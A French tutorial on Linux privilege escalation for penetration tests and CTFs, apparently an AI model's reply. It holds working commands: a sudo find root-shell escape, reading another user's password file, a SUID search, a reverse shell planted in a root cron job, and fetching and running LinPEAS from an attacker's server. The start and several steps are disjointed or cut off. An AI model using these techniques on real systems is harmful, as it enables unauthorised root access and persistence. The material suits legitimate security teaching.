L'Élévation de Privilèges (PrivEsc) consiste à trouver une faille pour devenir root (sur Linux) ou SYSTEM (sur Windows).
L'élévation de privilèges consiste à exploiter une faille ou une mauvaise configuration pour obtenir des droits supérieurs à ceux initialement attribués.
C'est souvent la partie la plus stimulante d'un test d'intrusion. Voici les étapes clés pour réussir.
www-data à developpeur). Cela peut vous donner accès à de nouveaux fichiers qui cachent peut-être le mot de passe root.Avant de tenter d'exploiter quoi que ce soit, vous devez observer. Environ 90% de l'élévation de privilèges est une question d'observation.
whoami : Qui suis-je ?id : À quels groupes j'appartiens ? (ex: le groupe docker ou lxd permet souvent de devenir root facilement).uname -a : Quelle est la version du noyau (kernel) ? (Pour chercher des exploits comme Dirty Pipe).sudo -l : La commande la plus importante. Elle liste ce que vous avez le droit de lancer avec les droits root sans mot de passe.Si sudo -l montre que vous pouvez lancer vim, find ou nmap en tant que root, c'est gagné.
Le site de référence ici est GTFOBins. Il répertorie comment détourner des binaires légitimes pour obtenir un shell root.
il faut déjà avoir le droit d'exécuter la commande find via sudo pour que la commande ci-dessous fonctionne. (ce que l'on vérifie habituellement avec sudo -l).
Exemple avec find :
sudo find . -exec /bin/sh -p \; -quit
Ou pour lire directement le fichier en tant que sudo sans l’être.
sudo -u stagiaire /bin/cat ../secret/.passwd
Certains fichiers ont un "bit" spécial qui permet de les exécuter avec les droits du propriétaire (souvent root).
Pour les trouver :
find / -perm -u=s -type f 2>/dev/null
Si vous voyez un binaire inhabituel dans la liste, vérifiez sa syntaxe sur GTFOBins.
Si un script tourne toutes les minutes en tant que root et que vous avez le droit de le modifier (écriture), vous pouvez y ajouter votre commande de reverse shell.
ls -la /etc/crontab
Si le système est très vieux et non mis à jour, il existe peut-être un exploit public. C'est la méthode de "dernier recours" car elle peut faire planter le serveur.
En conditions réelles ou en CTF (Capture The Flag), on utilise des scripts d'énumération automatique pour gagner du temps.
python3 -m http.server 80). Sur la cible, téléchargez l'outil : wget http://VOTRE_IP/linpeas.sh.chmod +x linpeas.sh && ./linpeas.sh.Une fois root, la dernière étape du hacker est généralement la Persistance (s'assurer de pouvoir revenir même si le serveur redémarre) et le Nettoyage des traces.
Souhaitez-vous que l'on regarde comment utiliser LinPEAS plus en détail ou préfères-tu un exemple concret sur une faille spécifique (comme une mauvaise configuration Sudo) ?